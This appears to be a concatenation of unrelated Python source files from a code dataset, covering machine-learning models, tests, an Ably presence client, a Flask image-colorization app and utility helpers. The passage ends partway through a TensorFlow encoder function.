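# A minimal usage sketch (assumes `sample` is a dict with an HxWxC uint8 'img'
# and an optional 'segLabel' array, as __call__ expects above):
# sample = RandomFlip(prob_x=0.5, prob_y=0.1)(sample)
# sample = Darkness(coeff=3.0)(sample)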
|
65467
|
from head.metrics import *
from head.metrics_parallel import *
HEAD_DICT = {
"Softmax": Softmax,
"ArcFace": ArcFace,
"Combined": Combined,
"CosFace": CosFace,
"SphereFace": SphereFace,
"Am_softmax": Am_softmax,
"CurricularFace": CurricularFace,
"ArcNegFace": ArcNegFace,
"SVX": SVXSoftmax,
"AirFace": AirFace,
"QAMFace": QAMFace,
"CircleLoss": CircleLoss,
"ParallelArcFace": ParallelArcFace,
}
|
65469
|
from text import symbols
class Hparams:
def __init__(self):
################################
# Experiment Parameters #
################################
self.epochs = 500
self.iters_per_checkpoint = 1000
self.iters_per_validation = 1000
self.seed = 1234
self.dynamic_loss_scaling = True
self.fp16_run = False
self.distributed_run = False
self.cudnn_enabled = True
self.cudnn_benchmark = False
self.ignore_layers = ["embedding.weight"]
################################
# Data Parameters #
################################
self.training_files = "DATASET/train.csv.txt"
self.validation_files = "DATASET/val.csv.txt"
self.text_cleaners = ["basic_cleaners"]
self.symbols_lang = "en" # en: English characters; py: Chinese Pinyin symbols
################################
# Model Parameters #
################################
self.tacotron_version = "2" # 1: Tacotron; 2: Tacotron-2
self.tacotron_config = "tacotron2.json"
self.num_symbols = len(symbols(self.symbols_lang))
self.symbols_embed_dim = 512
self.mel_dim = 80
self.r = 3
self.max_decoder_steps = 1000
self.stop_threshold = 0.5
################################
# Optimization Hyperparameters #
################################
self.use_saved_learning_rate = False
self.learning_rate = 1e-3
self.weight_decay = 1e-6
self.grad_clip_thresh = 1.0
self.batch_size = 32
self.mask_padding = True # set model's padded outputs to padded values
def __str__(self):
return "\n".join(
["Hyper Parameters:"]
+ ["{}:{}".format(key, getattr(self, key, None)) for key in self.__dict__]
)
def create_hparams():
"""Create model hyperparameters. Parse nondefault from object args."""
return Hparams()
|
65507
|
import spartan
from spartan import core, expr, util, blob_ctx
import numpy as np
from .qr import qr
def svd(A, k=None):
"""
Stochastic SVD.
Parameters
----------
A : spartan matrix
Array to compute the SVD on, of shape (M, N)
k : int, optional
Number of singular values and vectors to compute.
The operations include matrix multiplication and QR decomposition.
We parallelize both of them.
Returns
--------
U : Spartan array of shape (M, k)
S : numpy array of shape (k,)
V : numpy array of shape (k, k)
"""
if k is None: k = A.shape[1]
Omega = expr.randn(A.shape[1], k)
Y = expr.dot(A, Omega)
Q, R = qr(Y)
B = expr.dot(expr.transpose(Q), A)
BTB = expr.dot(B, expr.transpose(B)).optimized().glom()
S, U_ = np.linalg.eig(BTB)
S = np.sqrt(S)
# Sort by eigen values from large to small
si = np.argsort(S)[::-1]
S = S[si]
U_ = U_[:, si]
U = expr.dot(Q, U_).optimized().evaluate()
V = np.dot(np.dot(expr.transpose(B).optimized().glom(), U_), np.diag(np.ones(S.shape[0]) / S))
return U, S, V.T
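# A hypothetical usage sketch (spartan expressions; shapes as documented above):
# A = expr.randn(10000, 100)
# U, S, VT = svd(A, k=10)  # U: (10000, 10), S: (10,), VT: (10, 100)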
|
65528
|
from datetime import datetime, timedelta
from urllib import parse
from ably.http.paginatedresult import PaginatedResult
from ably.types.mixins import EncodeDataMixin
def _ms_since_epoch(dt):
epoch = datetime.utcfromtimestamp(0)
delta = dt - epoch
return int(delta.total_seconds() * 1000)
def _dt_from_ms_epoch(ms):
epoch = datetime.utcfromtimestamp(0)
return epoch + timedelta(milliseconds=ms)
class PresenceAction:
ABSENT = 0
PRESENT = 1
ENTER = 2
LEAVE = 3
UPDATE = 4
class PresenceMessage(EncodeDataMixin):
def __init__(self,
id=None, # TP3a
action=None, # TP3b
client_id=None, # TP3c
connection_id=None, # TP3d
data=None, # TP3e
encoding=None, # TP3f
timestamp=None, # TP3g
member_key=None, # TP3h (for RT only)
extras=None, # TP3i (functionality not specified)
):
self.__id = id
self.__action = action
self.__client_id = client_id
self.__connection_id = connection_id
self.__data = data
self.__encoding = encoding
self.__timestamp = timestamp
self.__member_key = member_key
self.__extras = extras
@property
def id(self):
return self.__id
@property
def action(self):
return self.__action
@property
def client_id(self):
return self.__client_id
@property
def connection_id(self):
return self.__connection_id
@property
def data(self):
return self.__data
@property
def encoding(self):
return self.__encoding
@property
def timestamp(self):
return self.__timestamp
@property
def member_key(self):
if self.connection_id and self.client_id:
return "%s:%s" % (self.connection_id, self.client_id)
@property
def extras(self):
return self.__extras
@staticmethod
def from_encoded(obj, cipher=None):
id = obj.get('id')
action = obj.get('action', PresenceAction.ENTER)
client_id = obj.get('clientId')
connection_id = obj.get('connectionId')
data = obj.get('data')
encoding = obj.get('encoding', '')
timestamp = obj.get('timestamp')
# member_key = obj.get('memberKey', None)
extras = obj.get('extras', None)
if timestamp is not None:
timestamp = _dt_from_ms_epoch(timestamp)
decoded_data = PresenceMessage.decode(data, encoding, cipher)
return PresenceMessage(
id=id,
action=action,
client_id=client_id,
connection_id=connection_id,
timestamp=timestamp,
extras=extras,
**decoded_data
)
class Presence:
def __init__(self, channel):
self.__base_path = '/channels/%s/' % parse.quote_plus(channel.name)
self.__binary = channel.ably.options.use_binary_protocol
self.__http = channel.ably.http
self.__cipher = channel.cipher
def _path_with_qs(self, rel_path, qs=None):
path = rel_path
if qs:
path += ('?' + parse.urlencode(qs))
return path
async def get(self, limit=None):
qs = {}
if limit:
if limit > 1000:
raise ValueError("The maximum allowed limit is 1000")
qs['limit'] = limit
path = self._path_with_qs(self.__base_path + 'presence', qs)
presence_handler = make_presence_response_handler(self.__cipher)
return await PaginatedResult.paginated_query(
self.__http, url=path, response_processor=presence_handler)
async def history(self, limit=None, direction=None, start=None, end=None):
qs = {}
if limit:
if limit > 1000:
raise ValueError("The maximum allowed limit is 1000")
qs['limit'] = limit
if direction:
qs['direction'] = direction
if start:
if isinstance(start, int):
qs['start'] = start
else:
qs['start'] = _ms_since_epoch(start)
if end:
if isinstance(end, int):
qs['end'] = end
else:
qs['end'] = _ms_since_epoch(end)
if 'start' in qs and 'end' in qs and qs['start'] > qs['end']:
raise ValueError("'end' parameter has to be greater than or equal to 'start'")
path = self._path_with_qs(self.__base_path + 'presence/history', qs)
presence_handler = make_presence_response_handler(self.__cipher)
return await PaginatedResult.paginated_query(
self.__http, url=path, response_processor=presence_handler)
def make_presence_response_handler(cipher):
def encrypted_presence_response_handler(response):
messages = response.to_native()
return PresenceMessage.from_encoded_array(messages, cipher=cipher)
return encrypted_presence_response_handler
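# A hypothetical usage sketch (inside an async context, with `channel` a REST
# channel object as Presence.__init__ above assumes):
# members = await channel.presence.get(limit=100)
# history = await channel.presence.history(direction='backwards', limit=100)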
|
65534
|
from collections import namedtuple
import tensorflow as tf
import numpy as np
from rl.agents.a2c.agent import A2CAgent
TestArgType = namedtuple('ArgType', ['name'])
arg_type = TestArgType('arg')
A = np.array
class A2CAgentTest(tf.test.TestCase):
def test_compute_policy_log_probs(self):
from rl.agents.a2c.agent import compute_policy_log_probs
available_actions = A([[1, 0, 1],
[1, 0, 0],
[1, 1, 1]], dtype=np.float32)
fn_pi = A([[0.2, 0.0, 0.8],
[1.0, 0.0, 0.0],
[0.2, 0.7, 0.1]], dtype=np.float32)
fn_ids = A([2, 0, 1], dtype=np.int32)
arg_pi = {arg_type: A([[0.8, 0.2],
[0.0, 1.0],
[0.5, 0.5]], dtype=np.float32)}
arg_ids = {arg_type: A([0, 1, -1], dtype=np.int32)}
log_probs = compute_policy_log_probs(
available_actions, (fn_pi, arg_pi), (fn_ids, arg_ids)
)
expected_log_probs = np.log([0.8, 1.0, 0.7]) + A([np.log(0.8), np.log(1.0), 0])
with self.test_session() as sess:
log_probs_out = sess.run(log_probs)
self.assertAllClose(log_probs_out, expected_log_probs)
def test_compute_policy_entropy(self):
from rl.agents.a2c.agent import compute_policy_entropy
available_actions = A([[1, 0, 1],
[1, 0, 0],
[1, 1, 1]], dtype=np.float32)
fn_pi = A([[0.2, 0.0, 0.8],
[1.0, 0.0, 0.0],
[0.2, 0.7, 0.1]], dtype=np.float32)
fn_ids = A([2, 0, 1], dtype=np.int32)
arg_pi = {arg_type: A([[0.8, 0.2],
[0.0, 1.0],
[0.5, 0.5]], dtype=np.float32)}
arg_ids = {arg_type: A([0, 1, -1], dtype=np.int32)}
entropy = compute_policy_entropy(
available_actions, (fn_pi, arg_pi), (fn_ids, arg_ids)
)
expected_entropy = (0.50040245 + 0.80181855) / 3.0 + (0.50040245) / 2
with self.test_session() as sess:
entropy_out = sess.run(entropy)
self.assertAllClose(entropy_out, expected_entropy)
if __name__ == '__main__':
tf.test.main()
|
65548
|
from oso import Oso
from .auth import register_models
class SQLAlchemyOso(Oso):
"""The central object to manage application policy state, e.g.
the policy data, and verify requests when using Oso with SQLAlchemy.
Supports SQLAlchemy-specific functionality, including data filtering.
Accepts a SQLAlchemy declarative_base on initialization, which is used to register
all relevant SQLAlchemy models with Oso.
>>> from sqlalchemy_oso import SQLAlchemyOso
>>> from sqlalchemy.ext.declarative import declarative_base
>>> Base = declarative_base(name="MyBaseModel")
>>> SQLAlchemyOso(Base)
<sqlalchemy_oso.oso.SQLAlchemyOso object at 0x...>
"""
def __init__(self, sqlalchemy_base):
super().__init__()
# Register all sqlalchemy models on sqlalchemy_base
register_models(self, sqlalchemy_base)
self.base = sqlalchemy_base
|
65551
|
import logging
from helium.common.managers.basemanager import BaseManager, BaseQuerySet
__author__ = "<NAME>"
__copyright__ = "Copyright 2019, Helium Edu"
__version__ = "1.4.38"
logger = logging.getLogger(__name__)
class EventQuerySet(BaseQuerySet):
def exists_for_user(self, id, user_id):
return self.filter(pk=id, user_id=user_id).exists()
def for_user(self, user_id):
return self.filter(user_id=user_id)
class EventManager(BaseManager):
def get_queryset(self):
return EventQuerySet(self.model, using=self._db)
def exists_for_user(self, id, user_id):
return self.get_queryset().exists_for_user(id, user_id)
def for_user(self, user_id):
return self.get_queryset().for_user(user_id)
|
65609
|
import pytest
from unittest.mock import patch
import tests.fixtures.journal as FakeJournalExporter
from systemdlogger.elasticsearch import ElasticsearchLogger
@pytest.mark.parametrize(('config_path'), [
'tests/fixtures/config_es.json'
])
class TestRunner:
def setup_method(self, method):
""" setup any state tied to the execution of the given method in a
class. setup_method is invoked for every test method of a class.
"""
modules = {
'systemdlogger.journal': FakeJournalExporter
}
self.module_patcher = patch.dict('sys.modules', modules)
self.module_patcher.start()
from systemdlogger.runner import Runner
self.Runner = Runner
def teardown_method(self, method):
""" teardown any state that was previously setup with a setup_method
call.
"""
self.module_patcher.stop()
def test_init(self, config_path):
runner = self.Runner(config_path)
assert len(runner.loggers) == 1
assert isinstance(runner.loggers[0], ElasticsearchLogger)
def test_run(self, config_path):
runner = self.Runner(config_path)
runner.run()
|
65616
|
from .base import TrainingCallback, ValueTrainingCallback
class LearningRateScheduler(TrainingCallback):
"""
    The learning rate scheduler wraps a PyTorch learning rate scheduler, stepping it
    automatically after the end of every iteration or epoch.
"""
def __init__(self, scheduler, metric=None, after_batch=False):
"""
Initializes a new learning rate scheduler for the given PyTorch scheduler.
Parameters
----------
scheduler: torch.optim.lr_scheduler
The PyTorch scheduler.
metric: str, default: None
The metric to pass to the scheduler, e.g. useful for reducing the learning rate as the
            validation loss plateaus. Typically, it should only be used with :code:`after_batch`
set to `False`.
after_batch: bool, default: False
Whether to call the scheduler after every batch or after every epoch.
"""
self.exec_after_batch = after_batch
self.metric = metric
self.scheduler = scheduler
def after_batch(self, metrics):
if self.exec_after_batch:
self._exec(metrics)
def after_epoch(self, metrics):
if not self.exec_after_batch:
self._exec(metrics)
def _exec(self, metrics):
if self.metric is not None:
self.scheduler.step(metrics[self.metric])
else:
self.scheduler.step()
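# A minimal usage sketch (the surrounding training loop is an assumption; only
# the callback wiring is shown):
# scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer)
# callback = LearningRateScheduler(scheduler, metric='val_loss', after_batch=False)
# the trainer then calls callback.after_epoch({'val_loss': ...}) once per epoch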
class ParameterScheduler(ValueTrainingCallback):
"""
The parameter scheduler is able to change the value of a variable over the course of the
training.
"""
def __init__(self, initial, schedule, *args, **kwargs):
r"""
        Initializes a new scheduler for the given parameter.
Parameters
----------
initial: object
            The initial value of the parameter which should be modified over the course of the
training.
schedule: func (object, int, int, \**kwargs) -> object
Function which should return the value of the parameter based on the current value of
the parameter, the current epoch, and the iteration within the epoch. The function is
called after every iteration (i.e. batch). It is further passed the arguments given to
this initializer.
args: variadic argument
Additional arguments passed to the :code:`schedule` function.
kwargs: keyword arguments
Additional keyword arguments passed to the :code:`schedule` function.
"""
self.parameter = initial
self.schedule = schedule
self.args = args
self.kwargs = kwargs
self.epoch = None
self.iteration = None
def read(self):
return self.parameter
def before_training(self, model, num_epochs):
self.iteration = 0
def before_epoch(self, current, num_iterations):
self.epoch = current
def after_batch(self, metrics):
self.iteration += 1
self._update()
def after_epoch(self, metrics):
self._update()
def after_training(self):
self.epoch = None
self.iteration = None
def _update(self):
self.parameter = self.schedule(
self.parameter, self.epoch, self.iteration, *self.args, **self.kwargs
)
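# An example schedule function matching the documented signature (a sketch;
# `decay` is forwarded through the initializer's args/kwargs):
# def exponential_decay(value, epoch, iteration, decay=0.99):
#     return value * decay
# param = ParameterScheduler(initial=1.0, schedule=exponential_decay, decay=0.95)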
|
65629
|
from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName
from genshi.core import START, END, XML_NAMESPACE, DOCTYPE, TEXT
from genshi.core import START_NS, END_NS, START_CDATA, END_CDATA, PI, COMMENT
from . import base
from ..constants import voidElements, namespaces
class TreeWalker(base.TreeWalker):
def __iter__(self):
# Buffer the events so we can pass in the following one
previous = None
for event in self.tree:
if previous is not None:
for token in self.tokens(previous, event):
yield token
previous = event
# Don't forget the final event!
if previous is not None:
for token in self.tokens(previous, None):
yield token
def tokens(self, event, next):
kind, data, _ = event
if kind == START:
tag, attribs = data
name = tag.localname
namespace = tag.namespace
converted_attribs = {}
for k, v in attribs:
if isinstance(k, QName):
converted_attribs[(k.namespace, k.localname)] = v
else:
converted_attribs[(None, k)] = v
if namespace == namespaces["html"] and name in voidElements:
for token in self.emptyTag(namespace, name, converted_attribs,
not next or next[0] != END or
next[1] != tag):
yield token
else:
yield self.startTag(namespace, name, converted_attribs)
elif kind == END:
name = data.localname
namespace = data.namespace
if namespace != namespaces["html"] or name not in voidElements:
yield self.endTag(namespace, name)
elif kind == COMMENT:
yield self.comment(data)
elif kind == TEXT:
for token in self.text(data):
yield token
elif kind == DOCTYPE:
yield self.doctype(*data)
elif kind in (XML_NAMESPACE, DOCTYPE, START_NS, END_NS,
START_CDATA, END_CDATA, PI):
pass
else:
yield self.unknown(kind)
|
65631
|
from __future__ import absolute_import
from django.conf import settings
from api.mon.backends import zabbix
from api.mon.backends import dummy
__all__ = ('get_monitoring', 'del_monitoring', 'MonitoringBackend', 'MonitoringServer')
BACKEND_ALIASES = {
'dummy': dummy,
'zabbix': zabbix,
}
DEFAULT_BACKEND = 'zabbix'
backend = BACKEND_ALIASES[getattr(settings, 'MONITORING_BACKEND', DEFAULT_BACKEND)]
MonitoringBackend = backend.MonitoringBackendClass
MonitoringServer = backend.MonitoringServerClass
MonitoringBackend.server_class = MonitoringServer
def get_monitoring(dc, **kwargs):
return backend.get_monitoring(dc, **kwargs)
def del_monitoring(dc):
return backend.del_monitoring(dc)
|
65647
|
from copy import deepcopy
import six
from lxml import etree
from regparser import plugins
from regparser.tree.xml_parser.preprocessors import replace_html_entities
class XMLWrapper(object):
"""Wrapper around XML which provides a consistent interface shared by both
Notices and Annual editions of XML"""
def __init__(self, xml, source=None):
"""Includes automatic conversion from string and a deep copy for
        safety. `source` represents the provenance of this xml. It is _not_
serialized and hence does not follow the xml through the index"""
if isinstance(xml, six.binary_type):
xml = replace_html_entities(xml)
self.xml = etree.fromstring(xml)
elif isinstance(xml, etree._Element):
self.xml = deepcopy(xml)
else:
raise ValueError("xml should be either binary or an lxml node")
self.source = source
def preprocess(self):
"""Unfortunately, the notice xml is often inaccurate. This function
attempts to fix some of those (general) flaws. For specific issues, we
tend to instead use the files in settings.LOCAL_XML_PATHS"""
for plugin in plugins.instantiate_if_possible(
'eregs_ns.parser.preprocessors', method_name='transform'):
plugin(self.xml)
return self
def xpath(self, *args, **kwargs):
return self.xml.xpath(*args, **kwargs)
def xml_str(self):
return etree.tounicode(self.xml, pretty_print=True)
def _find_or_create(self, tag):
"""Look for the first matching tag present in the document. If it's
not present, create it by inserting it into the root"""
matches = self.xpath('//' + tag)
if matches:
return matches[0]
else:
return etree.SubElement(self.xml, tag)
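# A hypothetical usage sketch:
# wrapper = XMLWrapper(b"<ROOT><CHILD/></ROOT>", source="notice.xml").preprocess()
# child = wrapper.xpath('//CHILD')[0]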
|
65668
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
print('hello world')
|
65673
|
import sys
import base_func as base
import twint
from similar_hashtags import similar_hashtags
from top_mentions_hashtags import top_mentions_hashtags as mentions
def basic(username,search):
base.get_user_bio(username,search)
base.get_user_tweets(username,search,True)
def get_keyword(key,limit=100):
base.get_tweets(key,limit)
def top_mention():
    key_val = int(input('Number of users: '))
    seed_user = list(map(str, input('Enter usernames: ').strip().split()))[:key_val]
    limit = int(input('Number of tweets to be pulled: '))  # default limit = 500
for username in seed_user:
mentions.get_top_mentions_hashtags(username)
def similar_hashtag():
    key_val = int(input('Number of hashtags: '))
    seed_hash = list(map(str, input('Enter hashtags: ').strip().split()))[:key_val]
    limit = int(input('Number of tweets to be pulled: '))  # default limit = 500
for seed_hashtag in seed_hash:
similar_hashtags.get_similar_hashtags(seed_hashtag, limit)
if __name__ == "__main__":
username = sys.argv[1]
string = sys.argv[2]
basic(username,string)
|
65745
|
from flask import Flask, flash, request, redirect, url_for, render_template
from werkzeug.utils import secure_filename
import os
from keras.models import load_model
from keras.applications.inception_resnet_v2 import InceptionResNetV2
import tensorflow as tf
from skimage.io import imsave
from skimage.transform import resize
import numpy as np
from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img
from skimage.color import rgb2lab, lab2rgb, rgb2gray, gray2rgb
from keras.applications.inception_resnet_v2 import preprocess_input
from PIL import Image,ImageChops
import logging
global graph
graph = tf.get_default_graph()
app = Flask(__name__)
app.secret_key = "hello"
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
model = load_model('trained-model.h5')
UPLOAD_FOLDER = '/home/nubaf/Git-Projects/colorization/files'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
files = [f for f in os.listdir('.') if os.path.isfile(f)]
checkInception = False
for f in files:
if f == "inception.h5":
checkInception = True
inception = load_model('inception.h5', compile=False)
break
if not checkInception:
inception = InceptionResNetV2(weights='imagenet', include_top=True)
inception.save('inception.h5')
inception.graph = graph
def create_inception_embedding(grayscaled_rgb):
grayscaled_rgb_resized = []
for i in grayscaled_rgb:
i = resize(i, (299, 299, 3), mode='constant')
grayscaled_rgb_resized.append(i)
grayscaled_rgb_resized = np.array(grayscaled_rgb_resized)
grayscaled_rgb_resized = preprocess_input(grayscaled_rgb_resized)
with graph.as_default():
embed = inception.predict(grayscaled_rgb_resized)
return embed
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
try:
url = request.form['url']
if 'examples' in url:
color_file = process(url)
return render_template('index.html', res='static/examples/girl.jpg')
# check if the post request has the file part
except:
logging.exception('')
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
color_file = process(file.filename)
return render_template('index.html', og=color_file[0], res=color_file[1])
return render_template('index.html')
def process(img):
if 'examples' in img:
im = Image.open(img)
name = img.split('.')[0].split('/')[-1]
else:
im = Image.open('files/' + img)
name = img.split('.')[0]
old_size = im.size # old_size[0] is in (width, height) format
ratio = float(256)/max(old_size)
new_size = tuple([int(x*ratio) for x in old_size])
im = im.resize(new_size, Image.ANTIALIAS)
new_im = Image.new("RGB", (256, 256))
new_im.paste(im, ((256-new_size[0])//2,(256-new_size[1])//2))
new_im.save('static/processed_png/' + name + ".png","PNG")
a = np.array(img_to_array(load_img('static/processed_png/' + name +'.png')))
a = a.reshape(1,256,256,3)
#gray_me = gray2rgb(rgb2gray(1.0/255*a))
color_me_embed = create_inception_embedding(a)
a = rgb2lab(1.0/255*a)[:,:,:,0]
a = a.reshape(a.shape+(1,))
with graph.as_default():
output = model.predict([a, color_me_embed])
output = output * 128
for i in range(len(output)):
cur = np.zeros((256, 256, 3))
cur[:,:,0] = a[i][:,:,0]
cur[:,:,1:] = output[i]
imsave(f'static/colored_img/{name}.png',(lab2rgb(cur)))
trim(Image.open(f'static/processed_png/{name}.png')).save(f'static/processed_png/{name}.png')
trim(Image.open(f'static/colored_img/{name}.png')).save(f'static/colored_img/{name}.png')
return (f'static/processed_png/{name}.png',f'static/colored_img/{name}.png')
def trim(im):
bg = Image.new(im.mode, im.size, im.getpixel((0,0)))
diff = ImageChops.difference(im, bg)
diff = ImageChops.add(diff, diff, 2.0, -100)
bbox = diff.getbbox()
    if bbox:
        return im.crop(bbox)
    return im  # nothing to trim; avoid returning None to callers that chain .save()
if __name__ == "__main__":
app.run(debug=True)
|
65764
|
import math
from ffmpeg import probe
def get_bitrate(video_path):
bitrate = probe(video_path)['format']['bit_rate']
return f'{math.trunc(int(bitrate) / 1000)} kbit/s'
def get_framerate_fraction(video_path):
r_frame_rate = [stream for stream in probe(video_path)['streams']
if stream['codec_type'] == 'video'][0][
'r_frame_rate']
return r_frame_rate
def get_framerate_float(video_path):
numerator, denominator = get_framerate_fraction(video_path).split('/')
return round((int(numerator) / int(denominator)), 3)
def get_duration(video_path):
return probe(video_path)['format']['duration']
def get_mbit_str(megabits):
return f'{megabits} Mbps'
def get_pretty_codec_name(codec):
    codec_names = {
        'h264': 'H.264 (AVC)',
        'hevc': 'H.265 (HEVC)'
    }
    return codec_names.get(codec, codec)
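# A hypothetical usage sketch ('input.mp4' is a placeholder path):
# print(get_bitrate('input.mp4'))          # e.g. '4500 kbit/s'
# print(get_framerate_float('input.mp4'))  # e.g. 23.976
# print(get_pretty_codec_name('hevc'))     # 'H.265 (HEVC)'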
|
65828
|
import tensorflow as tf
import math
from tensorflow.contrib.rnn import BasicLSTMCell, RNNCell, DropoutWrapper, MultiRNNCell
from rnn import stack_bidirectional_dynamic_rnn, CellInitializer, GRUCell, DropoutGRUCell
import utils, beam_search
def auto_reuse(fun):
"""
Wrapper that automatically handles the `reuse' parameter.
This is rather risky, as it can lead to reusing variables
by mistake.
"""
def fun_(*args, **kwargs):
try:
return fun(*args, **kwargs)
except ValueError as e:
if 'reuse' in str(e):
with tf.variable_scope(tf.get_variable_scope(), reuse=True):
return fun(*args, **kwargs)
else:
raise e
return fun_
get_variable = auto_reuse(tf.get_variable)
dense = auto_reuse(tf.layers.dense)
class CellWrapper(RNNCell):
"""
Wrapper around LayerNormBasicLSTMCell, BasicLSTMCell and MultiRNNCell, to keep
the state_is_tuple=False behavior (soon to be deprecated).
"""
def __init__(self, cell):
super(CellWrapper, self).__init__()
self.cell = cell
self.num_splits = len(cell.state_size) if isinstance(cell.state_size, tuple) else 1
@property
def state_size(self):
return sum(self.cell.state_size)
@property
def output_size(self):
return self.cell.output_size
def __call__(self, inputs, state, scope=None):
state = tf.split(value=state, num_or_size_splits=self.num_splits, axis=1)
new_h, new_state = self.cell(inputs, state, scope=scope)
return new_h, tf.concat(new_state, 1)
def multi_encoder(encoder_inputs, encoders, encoder_input_length, other_inputs=None, **kwargs):
"""
Build multiple encoders according to the configuration in `encoders`, reading from `encoder_inputs`.
The result is a list of the outputs produced by those encoders (for each time-step), and their final state.
:param encoder_inputs: list of tensors of shape (batch_size, input_length), one tensor for each encoder.
:param encoders: list of encoder configurations
:param encoder_input_length: list of tensors of shape (batch_size,) (one tensor for each encoder)
:return:
encoder outputs: a list of tensors of shape (batch_size, input_length, encoder_cell_size), hidden states of the
encoders.
encoder state: concatenation of the final states of all encoders, tensor of shape (batch_size, sum_of_state_sizes)
new_encoder_input_length: list of tensors of shape (batch_size,) with the true length of the encoder outputs.
      May be different than `encoder_input_length` because of maxout strides and time pooling.
"""
encoder_states = []
encoder_outputs = []
# create embeddings in the global scope (allows sharing between encoder and decoder)
embedding_variables = []
for encoder in encoders:
if encoder.binary:
embedding_variables.append(None)
continue
# inputs are token ids, which need to be mapped to vectors (embeddings)
embedding_shape = [encoder.vocab_size, encoder.embedding_size]
if encoder.embedding_initializer == 'sqrt3':
initializer = tf.random_uniform_initializer(-math.sqrt(3), math.sqrt(3))
else:
initializer = None
device = '/cpu:0' if encoder.embeddings_on_cpu else None
with tf.device(device): # embeddings can take a very large amount of memory, so
# storing them in GPU memory can be impractical
embedding = get_variable('embedding_{}'.format(encoder.name), shape=embedding_shape,
initializer=initializer)
embedding_variables.append(embedding)
new_encoder_input_length = []
for i, encoder in enumerate(encoders):
if encoder.use_lstm is False:
encoder.cell_type = 'GRU'
with tf.variable_scope('encoder_{}'.format(encoder.name)):
encoder_inputs_ = encoder_inputs[i]
encoder_input_length_ = encoder_input_length[i]
def get_cell(input_size=None, reuse=False):
if encoder.cell_type.lower() == 'lstm':
cell = CellWrapper(BasicLSTMCell(encoder.cell_size, reuse=reuse))
elif encoder.cell_type.lower() == 'dropoutgru':
cell = DropoutGRUCell(encoder.cell_size, reuse=reuse, layer_norm=encoder.layer_norm,
input_size=input_size, input_keep_prob=encoder.rnn_input_keep_prob,
state_keep_prob=encoder.rnn_state_keep_prob)
else:
cell = GRUCell(encoder.cell_size, reuse=reuse, layer_norm=encoder.layer_norm)
if encoder.use_dropout and encoder.cell_type.lower() != 'dropoutgru':
cell = DropoutWrapper(cell, input_keep_prob=encoder.rnn_input_keep_prob,
output_keep_prob=encoder.rnn_output_keep_prob,
state_keep_prob=encoder.rnn_state_keep_prob,
variational_recurrent=encoder.pervasive_dropout,
dtype=tf.float32, input_size=input_size)
return cell
embedding = embedding_variables[i]
batch_size = tf.shape(encoder_inputs_)[0]
time_steps = tf.shape(encoder_inputs_)[1]
if embedding is not None:
flat_inputs = tf.reshape(encoder_inputs_, [tf.multiply(batch_size, time_steps)])
flat_inputs = tf.nn.embedding_lookup(embedding, flat_inputs)
encoder_inputs_ = tf.reshape(flat_inputs,
tf.stack([batch_size, time_steps, flat_inputs.get_shape()[1].value]))
if other_inputs is not None:
encoder_inputs_ = tf.concat([encoder_inputs_, other_inputs], axis=2)
if encoder.use_dropout:
noise_shape = [1, time_steps, 1] if encoder.pervasive_dropout else [batch_size, time_steps, 1]
encoder_inputs_ = tf.nn.dropout(encoder_inputs_, keep_prob=encoder.word_keep_prob,
noise_shape=noise_shape)
size = tf.shape(encoder_inputs_)[2]
noise_shape = [1, 1, size] if encoder.pervasive_dropout else [batch_size, time_steps, size]
encoder_inputs_ = tf.nn.dropout(encoder_inputs_, keep_prob=encoder.embedding_keep_prob,
noise_shape=noise_shape)
if encoder.input_layers:
for j, layer_size in enumerate(encoder.input_layers):
if encoder.input_layer_activation is not None and encoder.input_layer_activation.lower() == 'relu':
activation = tf.nn.relu
else:
activation = tf.tanh
encoder_inputs_ = dense(encoder_inputs_, layer_size, activation=activation, use_bias=True,
name='layer_{}'.format(j))
if encoder.use_dropout:
encoder_inputs_ = tf.nn.dropout(encoder_inputs_, keep_prob=encoder.input_layer_keep_prob)
# Contrary to Theano's RNN implementation, states after the sequence length are zero
# (while Theano repeats last state)
inter_layer_keep_prob = None if not encoder.use_dropout else encoder.inter_layer_keep_prob
parameters = dict(
inputs=encoder_inputs_, sequence_length=encoder_input_length_,
dtype=tf.float32, parallel_iterations=encoder.parallel_iterations
)
input_size = encoder_inputs_.get_shape()[2].value
state_size = (encoder.cell_size * 2 if encoder.cell_type.lower() == 'lstm' else encoder.cell_size)
def get_initial_state(name='initial_state'):
if encoder.train_initial_states:
initial_state = get_variable(name, initializer=tf.zeros(state_size))
return tf.tile(tf.expand_dims(initial_state, axis=0), [batch_size, 1])
else:
return None
if encoder.bidir:
rnn = lambda reuse: stack_bidirectional_dynamic_rnn(
cells_fw=[get_cell(input_size if j == 0 else 2 * encoder.cell_size, reuse=reuse)
for j in range(encoder.layers)],
cells_bw=[get_cell(input_size if j == 0 else 2 * encoder.cell_size, reuse=reuse)
for j in range(encoder.layers)],
initial_states_fw=[get_initial_state('initial_state_fw')] * encoder.layers,
initial_states_bw=[get_initial_state('initial_state_bw')] * encoder.layers,
time_pooling=encoder.time_pooling, pooling_avg=encoder.pooling_avg,
**parameters)
initializer = CellInitializer(encoder.cell_size) if encoder.orthogonal_init else None
with tf.variable_scope(tf.get_variable_scope(), initializer=initializer):
try:
encoder_outputs_, _, encoder_states_ = rnn(reuse=False)
except ValueError: # Multi-task scenario where we're reusing the same RNN parameters
encoder_outputs_, _, encoder_states_ = rnn(reuse=True)
else:
if encoder.time_pooling or encoder.final_state == 'concat_last':
raise NotImplementedError
if encoder.layers > 1:
cell = MultiRNNCell([get_cell(input_size if j == 0 else encoder.cell_size)
for j in range(encoder.layers)])
initial_state = (get_initial_state(),) * encoder.layers
else:
cell = get_cell(input_size)
initial_state = get_initial_state()
encoder_outputs_, encoder_states_ = auto_reuse(tf.nn.dynamic_rnn)(cell=cell,
initial_state=initial_state,
**parameters)
last_backward = encoder_outputs_[:, 0, encoder.cell_size:]
